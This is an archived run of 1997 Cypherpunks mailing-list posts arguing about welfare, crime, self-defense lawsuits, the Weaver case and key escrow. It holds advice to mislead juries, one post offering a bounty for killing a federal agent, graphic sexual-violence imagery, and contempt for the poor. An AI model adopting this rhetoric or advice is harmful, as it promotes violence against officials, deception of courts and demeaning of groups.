> Meethinks (not speaking for Tim) that years under a fascist natzi-like
> regime bent on ripping out all out freedoms one by one and confiscating
> all things threatening to it would cause any awake person to lose any
> compassion for the scum that run our Freeh country.

Tim's problem is not lack of compassion for government workers - his 
problem is lack of compassion, period.  He wasn't talking about 
governments -- he was talking about a billion or so people -- the 
"sheeple", the "herd", the "underclass" -- whatever cute word he can 
overload with the considerable bile and and contempt at his command.  

The old saying, Ray, is that you can travel any path you want, but be
sure to choose one with heart.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From tcmay at got.net  Thu Aug 21 20:45:43 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 11:45:43 +0800
Subject: The Hazards of Expressing Opinions in Amerika
In-Reply-To: 
Message-ID: 



At 5:27 PM -0700 8/21/97, William H. Geiger III wrote:

>Somthing is seriously wrong when a home owner is more afraid of the
>consequences of defending his home than his is from the criminals
>attacking it.

Or when he is afraid of even expressing his opinion about defending his home!

Let me explain. A well-respected expert on self defense, Massad Ayoob,
writes for the various gun magazines. He's either a current or former New
Jersey cop, obviously of Arabic heritage. A very knowledgeable guy. He
often testifies in court cases involving a homeowner or shopkeeper
defending himself or his family.

Well, in recent years he's been increasingly strident about warning readers
not to do certain kinds of things, as these have been shown to affect jury
outcomes and have resulted in long prison terms for some of his employers.

I don't have a list of his "don'ts," but here's the idea, paraphrasing,
from memory:

* Don't use hollowpoints or any other politically incorrect ammunition,
even though these hollowpoints penetrate through walls less and are hence
safer to use in urban areas. Juries have been swayed to find for the
plaintiff, usually a perp who survived the self-defense, or his family, now
suing for everything the homeowner has.

* Don't use a self-loading rifle, and self-loading handguns are probably
best avoided, too. A plaintiff's lawyer will hold up a self-loader and
refer to it as an "automatic assault rifle," or, in the case of a
self-loading pistol, will scare the jury with tales of how "this gun can
fire a bullet with every pull of the trigger, spraying bullets." Best to
use an old-looking rifle, like an old side-by-side shotgun, or an old
Winchester 1894 lever gun, as the jury may be reminded of old Grandma and
her shotgun, or of John Wayne and his lever gun.

* Don't use any caliber of ammunition that has the word "magnum" in it.
Thus, no .357 Magnum, no .44 Magnum, etc. The word "magnum" makes a jury
think you were trying to kill the perp, which is bad.

(* Oh, it is best to say that you were only trying to "wing" the perp. If
he survives, say that this was your intent. If he dies, and his family is
pressing the damage claim, say it was an accident that he died. Of course,
all reputable self defense expert scoff at the notion of trying to "wing"
someone, and say that you shouldn't aim a gun at someone unless you plan to
shoot, and you shouldn't shoot unless you are aiming to kill, but don't say
anything about this to the jury. The jury wants to believe that shots can
be aimed to "wing" perps.)

* Don't fire more than one shot, as this may be argued to be "excessive
force." (Even though it is only apparent later, often much later, which
bullet incapacitated the intruder or robber. Firing just one shot and then
waiting to see if the perp stops shooting, or approaching, is rarely a wise
thing to do. When you have to shoot, you want to PUT HIM DOWN!! With as
many shots as you think it takes.)

* Don't publicly express opinions that a plaintiff's attorney could dig up
and use to show a "state of mind." No letters to the editor about cracking
down on criminals, no posts to the Net or mailing lists. (Ayoob hasn't
mentioned DejaNews, but one can imagine his reaction.)

* Don't belong to any militias, self-defense organizations, survivalist
groups, or even Community Watch programs. These have all been shown to
affect the nitwits on juries to find fro the poor innocent kid gunned down
in cold blood by the gun-toting right-wing Nazi.

* Don't subscribe, or purchase, gun magazines, survivalist literature, etc.
(Ayoob writes for gun magazines, ironically.)

* Don't use, or even own, a gun which a plaintiff's lawyer can hold up in
court and use to scare the jury members. This includes nearly any rifle
with a visible scope, visible detachable magazine, or one which is "black."
Even if this gun was not used in the action in question, all guns at the
residence will be seized by the authorities and made available to the other
side for use in their case.

* If possible, join left-wing organizations like the Sierra Club,
Greenpeace, and People for the Ethical Treatment of Animals. Jury members
will see one is a softhearted liberal, and maybe conclude that the intruder
was the one who deserved to be screwed, instead of the other way around. If
at all possible, register as a Democrat, as everyone knows Democrats aren't
gun-crazy killers like right-wingers are.

* Be careful what one writes in letters, in journals, or in other private
writings. These may become accessible under the "discovery" rules, and a
plaintiff's attorney may be able to find a quote or two which will make the
homeowner seem heartless or bloodthirsty.


(I'm not sure Ayoob has made all of these points. Some may be my own
contributions. But the gist is that civil damage cases are the real threat
to someone defending himself. And many homeowners insurance policies are
being changed to exclude protection for any situation involving the
discharge of a firearm.)

Ayoob was not always advocating such lamb-like, deceitful behavior. But
apparently he's seen too many cases where the political views and actions
of his employers undercut them in court and the perp who broke in or tried
to rob a store got multimillion dollar judgments from the person who used
"deadly force" to try to defend himself, his family, his employees, or his
business.

Another reason to use pseudonyms, of course.

(It's too late for me. A band of Hispanic home invaders could hit my house,
and I'd be the one found liable...all those posts their lawyers could find
with DejaNews or with other search engines. Including this one, which the
lawyer scum would use to show that I set out to "trick" the jury by
appearing to be mild and meek.)

--Tim May



There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From nobody at REPLAY.COM  Thu Aug 21 21:19:31 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 12:19:31 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: <199708220339.FAA09935@basement.replay.com>



Somebody that looked and sounded like Tim C May wrote:

> >The way I see it is quite simple,  if these peaple where not payed off it
> >is most likely that thay will turn to crime.  Other then condemming every
> >single impovished person to death, this is one of the better soultions to
> >a difficalt problem.
> 
[..]
> Agraphia or not, this is one of the lamest posts I've seen in years. Wealth
> is to be taken from those who have worked for it or put their capitcal at
> risk and given ("redistributed") to those who have done neither, just
> because we're afraid they'll steal it from us or "turn to crime" if we
> don't pay them off?

It certainly sounds like blackmail to me.

> What's wrong with chopping the hands off of thieves and executing muderers?

Surely people on this list are aware of how fallible governments are? 
Those punishments are a bit too final to be within the power of a legal
system so prone to mistakes and corruption. 

Although current western legal systems constrain citizens, they also
constrain the government, which is probably a good thing.  The media is
very weak on reporting abuses of power by police and the military, but at
least they're not always completely covered up.  

Yes, both individuals and governments can break the law, but it stops them
sometimes.

> The United States has a lot of redistribution of wealth and a lot of crime.

Other common oversimplifications include:

 The United States has a large gap between rich and poor and a lot 
 of crime.

 The United States has a lot of lawyers and a lot of crime.

 The United States has a lot of guns and a lot of crime.

::Boots

"Every problem has a simple solution... and it's wrong" -- Mark Twain






From JonWienk at ix.netcom.com  Thu Aug 21 21:35:41 1997
From: JonWienk at ix.netcom.com (Jonathan Wienke)
Date: Fri, 22 Aug 1997 12:35:41 +0800
Subject: Micro-Soft Humor
In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>
Message-ID: <3.0.2.32.19970821211807.006c93a4@popd.netcruiser>



At 12:24 PM 8/21/97 -0600, Tim G. May BFD wrote:
>Tim G. May *DID*NOT* write:
>  "Imitation is the sincerest form of Obsessive-Compulsive Disorder."
>-----------------------------------------------------------------------

"I am your robot slave. Your whim is my obsessive compulsion."

Bill Gates dies.  He meets Peter at the Pearly Gates, and Peter gives Bill
the option of going to Heaven or Hell.  Bill asks if he can see what his
options are, and Peter offers to show Bill around Heaven and Hell, so Bill
can see which he likes better.  As Bill tours Heaven, he sees nice houses
and meets friendly people, but when he gets to Hell, he sees green fields
dotted with patches of trees, placid streams, and attractive women who are
not-so-subtly lusting after his body.  After the tour is over, Bill decides
that while Heaven is nice, maybe Hell is just a little bit nicer, so Peter
sends Bill off to Hell.

Three days later, Peter decides to go see how Bill is making out in Hell.
He finds him in a dank, squalid dungeon, manacled to a post, with one demon
using a cattle prod on his testicles, and a couple others slowly peeling
pieces of his skin off with blowtorches and machetes, and then dousing him
with concentrated salt water.  Bill is furious.  "You bastard!  What you
showed me was nothing like this!"  Peter replies, "I'm truly sorry.  I
didn't mean to deceive you. I just showed you the demo."


On their wedding night, Bill's wife finally realized where Bill got the
inspiration for his company name.

Jonathan Wienke

What part of "the right of the people to keep and bear Arms, shall not be
infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution)

PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC
Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred.

US/Canadian Windows 95/NT or Mac users:
Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/
Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html
Commercial version of PGP 5.0 and related products at http://www.pgp.com
Eudora + PGP = Free, Convenient Communication Privacy

Go postal! Write your mommy a letter!






From cypherpunks at toad.com  Thu Aug 21 22:38:27 1997
From: cypherpunks at toad.com (cypherpunks at toad.com)
Date: Fri, 22 Aug 1997 13:38:27 +0800
Subject: take The Boulder Pledge now!!!
Message-ID: <199708220507.WAA10828@toad.com>



Eventually, all spam, and spamscam, would stop if everyone followed 
the advice of film critic Roger Ebert.  He wrote in *Yahoo*:

Last spring I was on a panel about "Bad Manners on the Net" 
at the Conference on World Affairs at the University of Colorado.  We 
agreeed that junk e-mail (then no more than a mote in the eye) could 
eventually bring the whole cooperative endeavor of online mail 
crashing to its ruin.  On the spot, I devised the Boulder Pledge, and 
we solemnly crossed our hearts and took it.  

                            The Boulder Pledge

                Under no circumstances will I ever purchase 
                *anything* offered to me as the result of an
                unsolicited e-mail message.  Nor will I 
                forward chain letters, petitions, mass mailings,
                or virus warnings to large numbers of others.
                This is my contribution to the survival of 
                the online community.

The Boulder Pledge works by making junk mail unprofitable.  If nobody 
*ever buys anything,* spammers eventually will quit.  I hope.

End the Plague.  Raise your right hand.  Read aloud [the Boulder 
Pledge].  Then, pass it on, via Email to 10 or 20 of your concerned
friends.  Thanks.

--
http://131.107.1.68/bbs/msnbc-commerce/710.htm






From nobody at REPLAY.COM  Thu Aug 21 22:51:21 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 13:51:21 +0800
Subject: ROTFL / Re: Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: <199708220530.HAA22261@basement.replay.com>



Ray Arachelian wrote:
> 
> On Thu, 21 Aug 1997, Tim G. May wrote:
> 
> > "When all you have is a gun, everything looks like a target."
> >
> > Tim G. May
> 
> When all you have are arrest warrants, everyone looks like a drug dealer.
> :)

  "When all you have is spam, everyone looks like Tim C. May."
         - Dimitri Vulis, KOTM







From nobody at REPLAY.COM  Thu Aug 21 22:57:38 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 13:57:38 +0800
Subject: State Charges in Weaver Case
Message-ID: <199708220532.HAA22375@basement.replay.com>



Mike Duvos wrote:
> FBI director Louis Freeh said he was "extremely disappointed" in the
> charges against Horiuchi, and promised that the Federal Government
> would spare no expense in defending him against them.
> 
> Hey, I've got an idea.  Is Stephan Jones free? :)

  No. Give him Jim Bell's lawyer--he can get them to reduce the charges
to "making the mortuary smell bad."







From nobody at REPLAY.COM  Thu Aug 21 22:59:00 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 13:59:00 +0800
Subject: Welfare Solution #389 / Re: Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: <199708220530.HAA22270@basement.replay.com>



William H. Geiger III wrote:
> A prime example is the welfair class in America. All their basic needs are
> provided for by the State (food, housing, medical, education, ...) and yet
> they have the highest crime rates. And make no mistake this isn't 18th
> century England where people are stealing a loaf of bread to survive the
> majority of these criminal are commiting their crimes to support their
> entertainments.

Welfare Solution #389:
  Many in the welfair class have their basic needs met by the government
and then steal to buy heroin.
  How about this? - When a person on welfare is busted for heroin use,
or theft to support a habit, the State thereafter sends the person's
welfare check to a Crime Restitution fund and lets the person keep
stealing, only now it is for the purpose of supplying their own
basic needs.
  The crime rate stays the same, but the victims receive some amount
of recompensation.

  Damn, I'm smart...

SmartMonger







From kent at songbird.com  Thu Aug 21 22:59:45 1997
From: kent at songbird.com (Kent Crispin)
Date: Fri, 22 Aug 1997 13:59:45 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: <19970821222631.62433@bywater.songbird.com>



On Thu, Aug 21, 1997 at 08:27:30PM -0400, William H. Geiger III wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In , on 08/21/97 
>    at 05:56 PM, Tim May  said:
> 
> >The United States has a lot of redistribution of wealth and a lot of
> >crime.
> 
> 
> This is one of the problems of socialism.
> 
> When you have a group in society that never has to earn what they have
> they tend to have little respect for the property of others.

More precisely, people only respect other's property when they have 
property of their own.  If you don't own anything, it doesn't matter 
to you what other people own.

> A prime example is the welfair class in America. All their basic needs are
> provided for by the State (food, housing, medical, education, ...) and yet
> they have the highest crime rates.

The question is, do they have a realistic opportunity to aquire 
property of their own?  If they do not, then the crime will be there 
whether or not they get welfare.  That is, if the best job available 
is being a criminal, guess what?  

> And make no mistake this isn't 18th
> century England where people are stealing a loaf of bread to survive the
> majority of these criminal are commiting their crimes to support their
> entertainments.

True enough.  One possible outcome of eliminating welfare would be to 
change the crimes back to stealing bread to survive.

The dream is that if you eliminate welfare the cold glare of reality 
will force the "welfair class" to become productive citizens or die.  
There are other possibilities.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From nobody at REPLAY.COM  Thu Aug 21 23:02:36 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 14:02:36 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: <199708220530.HAA22258@basement.replay.com>



William H. Geiger III wrote:
 
> Somthing is seriously wrong when a home owner is more afraid of the
> consequences of defending his home than his is from the criminals
> attacking it.

Policeman: "Sir, I'm calling to notify you that a criminal has broken
  into your house."
Citizen: "Damn. I hope he didn't hurt himself. I forgot to pay my 
  insurance bill this month."

  Tell me about it...







From kent at songbird.com  Thu Aug 21 23:06:38 1997
From: kent at songbird.com (Kent Crispin)
Date: Fri, 22 Aug 1997 14:06:38 +0800
Subject: heart
In-Reply-To: 
Message-ID: <19970821224221.31593@bywater.songbird.com>



On Fri, Aug 22, 1997 at 02:55:18AM +0200, Anonymous wrote:
> At 05:39 AM 8/22/97 +1000, you wrote:
> >> What compassion did they show?  Toilet plungers?  Bullets in the head,
> >> flame throwers and tanks?
> >
> >So we should resond in a simmler mannor?
> 
> Should we just sit idly by and let police officers attack citizens?

Of course not.  There are possible responses other than the ones you 
suggest, however.

> Or maybe we should do what our founders wanted, defend ourselves with
> miliary rifles.  So if a pig wants to shove a crowbar up your ass, are you
> going to shoot him, or just say "I would never violate your rights like this!"

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From dformosa at st.nepean.uws.edu.au  Thu Aug 21 23:12:09 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Fri, 22 Aug 1997 14:12:09 +0800
Subject: heart
In-Reply-To: <199708220055.CAA28492@basement.replay.com>
Message-ID: 



On Fri, 22 Aug 1997, Anonymous wrote:

> Should we just sit idly by and let police officers attack citizens?

No you should video it.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From kent at songbird.com  Thu Aug 21 23:13:21 1997
From: kent at songbird.com (Kent Crispin)
Date: Fri, 22 Aug 1997 14:13:21 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <19970820222934.23073@bywater.songbird.com>
Message-ID: <19970821224859.24682@bywater.songbird.com>



On Fri, Aug 22, 1997 at 12:40:29AM +0000, Vipul Ved Prakash wrote:
> Kent Crispin wrote:
> 
> > On Wed, Aug 20, 1997 at 08:51:09PM -0700, Tim May wrote:
> > > At 1:16 PM -0700 8/20/97, Patrick Oonk wrote:
> > > 
> > > But the ability of a herd to take a vote, real or alleged, will not be
> > > sufficient to collect tribute from those who don't want to make the
> > > contribution freely.
> 
> > Note another characteristic of cult thinking -- total separation of
> > the illuminati from the "herd" -- the idea that the "chosen" are
> > irrevocably different from those other unfortunate creatures that
> > accidentally share the same physical form. 
> 
> the idea is that the "competent" (not "chosen") are irrevocably different 
> from those other "incompetent and parasitical" (and not "unfortunate") 
> creatures that accidentally share the same physical form.

And how is it that one knows that one is "competent"?

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From anon at anon.efga.org  Thu Aug 21 23:13:40 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 22 Aug 1997 14:13:40 +0800
Subject: State Charges in Weaver Case
Message-ID: 



Ray Arachelian wrote:
> 
> On Thu, 21 Aug 1997, Mike Duvos wrote:
> 
> > I suppose it has something to do with that "only following
> > orders" thing. :)
> 
> Fine, then what shall we charge the one that gave the order with?  And
> what shal be the punishment?  If the one who takes the order relinquishes
> reposability, then the one giving the order must be doubly responsible.

  Jeez, Ray. If you follow this twisted train of logic, you end up
expecting the President and the Legislature to take responsibility for
the State of the Union.
  Are you some kind of godless Commie, or something? You'll certainly
feel foolish when the FBI lab proves that the trigger was pulled by
a drug dealer who was told to do so by a child molester. It's just a
shame that those poor federal agents had to be there to witness the
tragedy.

GovtLicensedMurderMonger








From dformosa at st.nepean.uws.edu.au  Thu Aug 21 23:15:39 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Fri, 22 Aug 1997 14:15:39 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: 



On Thu, 21 Aug 1997, Tim May wrote:

[...]

> >The way I see it is quite simple,  if these peaple where not payed off it
> >is most likely that thay will turn to crime.

[...]

> Given that the U.S. already has a huge system for redistributing wealth,
> and a very high crime rate, what is your evidence for your claim?

The US has one of the lowest rates of wealth redistribution in the
civilsed world  (Australia, most of europe ect have higher welfare rates).
Just because there is a huge burkasy for doing something dosn't mean that
it is happening.

[...]

> What's wrong with chopping the hands off of thieves and executing muderers?

Its wrong for the same reson that sodimising a person with a plunger is.

> The United States has a lot of redistribution of wealth and a lot of crime.

The US has very little redistribution and a lot of crime.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From dformosa at st.nepean.uws.edu.au  Thu Aug 21 23:38:36 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Fri, 22 Aug 1997 14:38:36 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



On Thu, 21 Aug 1997, Ray Arachelian wrote:

> On Fri, 22 Aug 1997, ? the Platypus {aka David Formosa} wrote:
> 
> > We can't let one group or other be considered less the human[1].  No one
> > is less or more desurving of basic rights.

[...]

> They already make themselves less than human by their actions, not by
> their identity.

No even by there acts thay do not reduce there humanity.  Humans do some
realy rotten things but that is just the nature of a creature with free
will.

[...]

> > So we should resond in a simmler mannor?
> 
> An eye for an eye, a toilet plunger for another.  That's the only true
> justice there can be.

Again I would not wish to live like that Nor do I beleave that it is true
justice (what ever that may be.).  Its a barbric form of psydojusice.

[...]

> Distinction: cypherpunks don't want to control or take away your privacy.

Of cause, nether do the goverment, in the beinging.  But ideals fade and
peaple become corrupted.  At some point someone is going to say "To
protect your privacy we have to violate your privacy."

> Cypherpunks don't use toilet plungers.  Cypherpunks write code. :)

But we are getting to the point where code can do more dammige and be more
effective then any toilet plunger could be.  (Though I dout it will
unblock drains)

[,..]

> I understand your fears, but hating the enemy and knowing the enemy isn't
> becoming it.

Its just I fear the cure where worce then the desease.

>  Revolutions aren't about taking over,

Thay shouldn't be, but thay often are.  History is littered with examples
of the heroic revolutionary leader becomeing the next dictor,  often
before the presdential chair has gotten cold.

> they're about freedom from the injustices done by the older regime.

Or stroking the egos and postion of the revolitionaries.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From anon at anon.efga.org  Thu Aug 21 23:41:22 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 22 Aug 1997 14:41:22 +0800
Subject: Key Recovery Solution # 12 / Re: Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: 



Lucky Green wrote:
> Remember this the next time you hear some clueless idiot claim that
> industry wants full key recovery. The last thing industry needs is access
> to all their confidential information during discovery.

Key Recovery Solution # 12:
  In order to keep the keys safe from the prying eyes of government,
industry could escrow them with a private company like INSLAW.








From whgiii at amaranth.com  Thu Aug 21 23:48:04 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 14:48:04 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <19970821222631.62433@bywater.songbird.com>
Message-ID: <199708220630.BAA17428@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <19970821222631.62433 at bywater.songbird.com>, on 08/21/97 
   at 10:26 PM, Kent Crispin  said:

>The dream is that if you eliminate welfare the cold glare of reality 
>will force the "welfair class" to become productive citizens or die.  
>There are other possibilities.

Not really as those who work for a living will always be able to afford
better weapons. :P

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/0kfI9Co1n+aLhhAQE6SgP9E965wGUKY6XrXfbIppRWwgDOYKcBySJ/
BQLNPEdbkAI9FPWHXSzzckybhEY7xIIijCqjIfWOD4EWw4lIhfInqBng2SpUJLTh
9mk8yo5McaLyt5rJpXu4GJwG0RfvTqoBkGW3DEmKNFb67vzumriUpqC3XhTXIA2Z
T9o21z9TEcI=
=DNI+
-----END PGP SIGNATURE-----






From apache at bear.apana.org.au  Thu Aug 21 23:56:46 1997
From: apache at bear.apana.org.au (Charles)
Date: Fri, 22 Aug 1997 14:56:46 +0800
Subject: heart
In-Reply-To: 
Message-ID: <199708220636.QAA08338@bear.apana.org.au>



-----BEGIN PGP SIGNED MESSAGE-----


>>>>> "df" == dformosa  
>>>>> wrote the following on Fri, 22 Aug 1997 15:32:01 +1000 (EST)

  df> On Fri, 22 Aug 1997, Anonymous wrote:

  >> Should we just sit idly by and let police officers attack
  >> citizens?

  df> No you should video it.

Let me see if I understand you correctly. Your wife/gf/mother/brother
is getting arsefucked by a cop with a toilet plunger and your
preferred course of action while his/her rectum is perforated would
be to video tape the event? Why? So we can all watch on Real TV. So
the perps can launch another cover up internal investigation?

You really wouldn't consider intervening to stop further damage?

Of course this assumes you're actually able to be present and witness
the 'interrogation', which you more than likely will not be, unless
it's your turn next at playing scrub the toilet bowl.

- --
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///                                   
>::::::::::\\\     PGP mail preferred                  Brisbane AUSTRALIA
   '\\\\\'   \\    Apache






-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEUAwUBM/0zinawhvoxf0r9AQFfvgf45b+qbLsJYWM6t4KfLNpR3bt640Uk0+ix
YHiFJ3uxxGiF2kuHUfR9E/f0f74X3+Tx6s02pn/Jb1zdVVZRuv5KJ/eVWaRmdn2F
5swv5ZwkLzcAQUaGWjjNnXWNDxmc2t3UF3dekOBcJCaxZ2kOclQh9ZsmZos4Vgks
09MVIjg5Ff13CfJokoCvSQ6kW9TuquBiY7t16VJLpm8Ygw1CAXWehTzpuV1boc9D
NOEkTcnVDmaxvs8Dm57G74aE8TFY4/4dAPmj0qMGJjKtU+Q3GNLXjRSkKC2sU6wm
/gdMMFMF7aSnU5OkNe56KMFR9H3kGLwWKJ5IT2XUbdDH60UNJrKi
=jJ82
-----END PGP SIGNATURE-----






From lharrison at mhv.net  Thu Aug 21 23:58:57 1997
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Fri, 22 Aug 1997 14:58:57 +0800
Subject: Welfare Solution #389
Message-ID: <3.0.3.32.19970822025223.006e9e10@pop.mhv.net>



At 07:30 AM 8/22/97 +0200, Anonymous wrote:
>
>Welfare Solution #389:
>  Many in the welfair class have their basic needs met by the government
>and then steal to buy heroin.
>  How about this? - When a person on welfare is busted for heroin use,
>or theft to support a habit, the State thereafter sends the person's
>welfare check to a Crime Restitution fund and lets the person keep
>stealing, only now it is for the purpose of supplying their own
>basic needs.

In NY, when a defendant gets convicted of a crime including a drug offense,
s/he has to pay a mandatory surcharge part of which is a Crime Victims'
Fee.  [Query: who is the victim in a drug case? -- but I digress...].
Also, if it was a crime where the victim suffered financial losses, the
defendant not only has to pay the Crime Victim's Fee but also restitution
to the victim.

Additionally, pursuant to Federal Law, anyone convicted of a drug charge
and, who is residing is federally-subsidized housing, becomes subject to
eviction proceedings.  [Quirk: if one family member is engaged in such
business activities, the entire family is captured under the law's umbrella
but, again, I digress..].


>  The crime rate stays the same, but the victims receive some amount
>of recompensation.

So-called crime rates are subject to the compilation *and* interpretation
of statistics, and for those of us who were lucky enough to have studied
Statistics, we know that these so-called statistical rates are ripe for
producing the desired results versus providing an accurate statistical
account.

Case in point: Prior to Reagan's Administration, the Armed Forces were
never included in the employed or non-employed categories.  Reagan added
the Armed Forces to the employed category, and the masses were tickled pink
when the government announced that employment rates increased dramatically.

 
>Damn, I'm smart...

Since I don't know you, I am in no position to comment.  You may be smart,
highly  intelligent, or a genius - or you may possess the analytical
processes of a gerbil.  Whichever category you are within, perhaps you
should keep in mind the old saying: "It's a thin line between genius and
insanity."  [A little appetizer for thought...].




**************************************************************************
Lynne L. Harrison, Esq.     |    Lazlo's Chinese Relatively Axiom:
Poughkeepsie, New York      |    "No matter how great your triumphs or
lharrison at mhv.net           |    how tragic your defeats, approximately
http://www.dueprocess.com   |    one billion Chinese couldn't care less."
**************************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.








From dlv at bwalk.dm.com  Thu Aug 21 23:59:21 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 22 Aug 1997 14:59:21 +0800
Subject: ROTFL / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <199708220530.HAA22261@basement.replay.com>
Message-ID: <2gRTBe6w165w@bwalk.dm.com>



nobody at REPLAY.COM (Anonymous) writes:

>
>   "When all you have is spam, everyone looks like Tim C. May."
>          - Dimitri Vulis, KOTM

What was that joke about the midget who went to the nudist camp and
though that everybody looked like Fidel Castro?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Fri Aug 22 00:00:47 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 22 Aug 1997 15:00:47 +0800
Subject: State Charges in Weaver Case
In-Reply-To: <19970822005931.27111.qmail@zipcon.net>
Message-ID: <3XqTBe4w165w@bwalk.dm.com>



Mike Duvos  writes:
>
> Shouldn't it be ... involuntary
> manslaughter for using possibly excessive force against an armed
> attacker?

No, it should be a $100 reward for icing a motherfucking fed.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From lharrison at mhv.net  Fri Aug 22 00:02:11 1997
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Fri, 22 Aug 1997 15:02:11 +0800
Subject: Welfare Solution #389
Message-ID: <3.0.3.32.19970822025549.006f3d6c@pop.mhv.net>



At 07:30 AM 8/22/97 +0200, Anonymous wrote:
>
>Welfare Solution #389:
>  Many in the welfair class have their basic needs met by the government
>and then steal to buy heroin.
>  How about this? - When a person on welfare is busted for heroin use,
>or theft to support a habit, the State thereafter sends the person's
>welfare check to a Crime Restitution fund and lets the person keep
>stealing, only now it is for the purpose of supplying their own
>basic needs.

In NY, when a defendant gets convicted of a crime including a drug offense,
s/he has to pay a mandatory surcharge part of which is a Crime Victims'
Fee.  [Query: who is the victim in a drug case? -- but I digress...].
Also, if it was a crime where the victim suffered financial losses, the
defendant not only has to pay the Crime Victim's Fee but also restitution
to the victim.

Additionally, pursuant to Federal Law, anyone convicted of a drug charge
and, who is residing is federally-subsidized housing, becomes subject to
eviction proceedings.  [Quirk: if one family member is engaged in such
business activities, the entire family is captured under the law's umbrella
but, again, I digress..].


>  The crime rate stays the same, but the victims receive some amount
>of recompensation.

So-called crime rates are subject to the compilation *and* interpretation
of statistics, and for those of us who were lucky enough to have studied
